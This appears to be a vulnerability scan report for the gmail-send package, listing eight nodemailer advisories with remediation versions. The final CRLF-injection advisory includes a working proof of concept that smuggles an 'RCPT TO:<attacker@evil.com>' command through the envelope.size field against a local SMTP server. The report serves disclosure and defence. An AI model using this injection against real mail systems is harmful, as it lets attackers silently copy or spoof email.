Vulnerabilities |
8 via 8 paths |
|---|---|
Dependencies |
2 |
Source |
GitHub |
Find, fix and prevent vulnerabilities in your code.
high severity
- Vulnerable module: nodemailer
- Introduced through: nodemailer@6.10.1
Detailed paths
-
Introduced through: gmail-send@alykoshin/gmail-send › nodemailer@6.10.1Remediation: Upgrade to nodemailer@7.0.11.
Overview
nodemailer is an Easy as cake e-mail sending from your Node.js applications
Affected versions of this package are vulnerable to Uncontrolled Recursion in the addressparser function. An attacker can cause the process to terminate immediately by sending an email address header containing deeply nested groups, separated by many :s.
Remediation
Upgrade nodemailer to version 7.0.11 or higher.
References
high severity
new
- Vulnerable module: nodemailer
- Introduced through: nodemailer@6.10.1
Detailed paths
-
Introduced through: gmail-send@alykoshin/gmail-send › nodemailer@6.10.1Remediation: Upgrade to nodemailer@8.0.9.
Overview
nodemailer is an Easy as cake e-mail sending from your Node.js applications
Affected versions of this package are vulnerable to CRLF Injection via the comment field in the list message option. An attacker can inject arbitrary headers into generated email messages by supplying crafted input containing CRLF sequences.
Remediation
Upgrade nodemailer to version 8.0.9 or higher.
References
high severity
new
- Vulnerable module: nodemailer
- Introduced through: nodemailer@6.10.1
Detailed paths
-
Introduced through: gmail-send@alykoshin/gmail-send › nodemailer@6.10.1Remediation: Upgrade to nodemailer@9.0.1.
Overview
nodemailer is an Easy as cake e-mail sending from your Node.js applications
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) via the message-level raw option bypassing disableFileAccess and disableUrlAccess flags. An attacker can access arbitrary local files or perform server-side request forgery by supplying crafted input to the raw field, which bypasses intended access restrictions and results in sensitive data being sent to an attacker-controlled recipient.
Remediation
Upgrade nodemailer to version 9.0.1 or higher.
References
medium severity
- Vulnerable module: nodemailer
- Introduced through: nodemailer@6.10.1
Detailed paths
-
Introduced through: gmail-send@alykoshin/gmail-send › nodemailer@6.10.1Remediation: Upgrade to nodemailer@8.0.5.
Overview
nodemailer is an Easy as cake e-mail sending from your Node.js applications
Affected versions of this package are vulnerable to CRLF Injection via the name configuration configuration option. An attacker can inject arbitrary SMTP commands by supplying carriage return and line feed sequences, enabling unauthorized email sending, sender spoofing, and phishing attacks before authentication occurs.
Remediation
Upgrade nodemailer to version 8.0.5 or higher.
References
medium severity
- Vulnerable module: nodemailer
- Introduced through: nodemailer@6.10.1
Detailed paths
-
Introduced through: gmail-send@alykoshin/gmail-send › nodemailer@6.10.1Remediation: Upgrade to nodemailer@7.0.7.
Overview
nodemailer is an Easy as cake e-mail sending from your Node.js applications
Affected versions of this package are vulnerable to Interpretation Conflict due to improper handling of quoted local-parts containing @. An attacker can cause emails to be sent to unintended external recipients or bypass domain-based access controls by crafting specially formatted email addresses with quoted local-parts containing the @ character.
Remediation
Upgrade nodemailer to version 7.0.7 or higher.
References
medium severity
new
- Vulnerable module: nodemailer
- Introduced through: nodemailer@6.10.1
Detailed paths
-
Introduced through: gmail-send@alykoshin/gmail-send › nodemailer@6.10.1Remediation: Upgrade to nodemailer@8.0.8.
Overview
nodemailer is an Easy as cake e-mail sending from your Node.js applications
Affected versions of this package are vulnerable to Improper Certificate Validation due to the use of rejectUnauthorized: false in the internal HTTPS client, which disables TLS certificate verification during OAuth2 token retrieval. An attacker can intercept sensitive OAuth2 credentials and tokens by performing a machine-in-the-middle attack on the HTTPS connection.
Remediation
Upgrade nodemailer to version 8.0.8 or higher.
References
medium severity
new
- Vulnerable module: nodemailer
- Introduced through: nodemailer@6.10.1
Detailed paths
-
Introduced through: gmail-send@alykoshin/gmail-send › nodemailer@6.10.1Remediation: Upgrade to nodemailer@8.0.9.
Overview
nodemailer is an Easy as cake e-mail sending from your Node.js applications
Affected versions of this package are vulnerable to Missing Authorization in the jsonTransport message, which fails to enforce file and URL access restrictions during message normalization. An attacker can access local files or trigger outbound HTTP requests by supplying crafted message content fields such as attachment path or text.href.
Remediation
Upgrade nodemailer to version 8.0.9 or higher.
References
low severity
- Vulnerable module: nodemailer
- Introduced through: nodemailer@6.10.1
Detailed paths
-
Introduced through: gmail-send@alykoshin/gmail-send › nodemailer@6.10.1Remediation: Upgrade to nodemailer@8.0.4.
Overview
nodemailer is an Easy as cake e-mail sending from your Node.js applications
Affected versions of this package are vulnerable to CRLF Injection via the envelope.size parameter in the sendMail function. An attacker can inject arbitrary SMTP commands by supplying CRLF characters in the size property, which are concatenated directly into the SMTP command stream. This can result in unauthorized recipients being added to outgoing emails or other SMTP commands being executed.
Note:
This is only exploitable if the application explicitly passes a custom envelope object with a user-controlled size property to the mail sending process.
PoC
const net = require('net');
const nodemailer = require('nodemailer');
// Minimal SMTP server that logs raw commands
const server = net.createServer(socket => {
socket.write('220 localhost ESMTP\r\n');
let buffer = '';
socket.on('data', chunk => {
buffer += chunk.toString();
const lines = buffer.split('\r\n');
buffer = lines.pop();
for (const line of lines) {
if (!line) continue;
console.log('C:', line);
if (line.startsWith('EHLO')) {
socket.write('250-localhost\r\n250-SIZE 10485760\r\n250 OK\r\n');
} else if (line.startsWith('MAIL FROM')) {
socket.write('250 OK\r\n');
} else if (line.startsWith('RCPT TO')) {
socket.write('250 OK\r\n');
} else if (line === 'DATA') {
socket.write('354 Start\r\n');
} else if (line === '.') {
socket.write('250 OK\r\n');
} else if (line.startsWith('QUIT')) {
socket.write('221 Bye\r\n');
socket.end();
}
}
});
});
server.listen(0, '127.0.0.1', () => {
const port = server.address().port;
console.log('SMTP server on port', port);
console.log('Sending email with injected RCPT TO...\n');
const transporter = nodemailer.createTransport({
host: '127.0.0.1',
port,
secure: false,
tls: { rejectUnauthorized: false },
});
transporter.sendMail({
from: 'sender@example.com',
to: 'recipient@example.com',
subject: 'Normal email',
text: 'This is a normal email.',
envelope: {
from: 'sender@example.com',
to: ['recipient@example.com'],
size: '100\r\nRCPT TO:<attacker@evil.com>',
},
}, (err) => {
if (err) console.error('Error:', err.message);
console.log('\nExpected output above:');
console.log(' C: MAIL FROM:<sender@example.com> SIZE=100');
console.log(' C: RCPT TO:<attacker@evil.com> <-- INJECTED');
console.log(' C: RCPT TO:<recipient@example.com>');
server.close();
transporter.close();
});
});
Remediation
Upgrade nodemailer to version 8.0.4 or higher.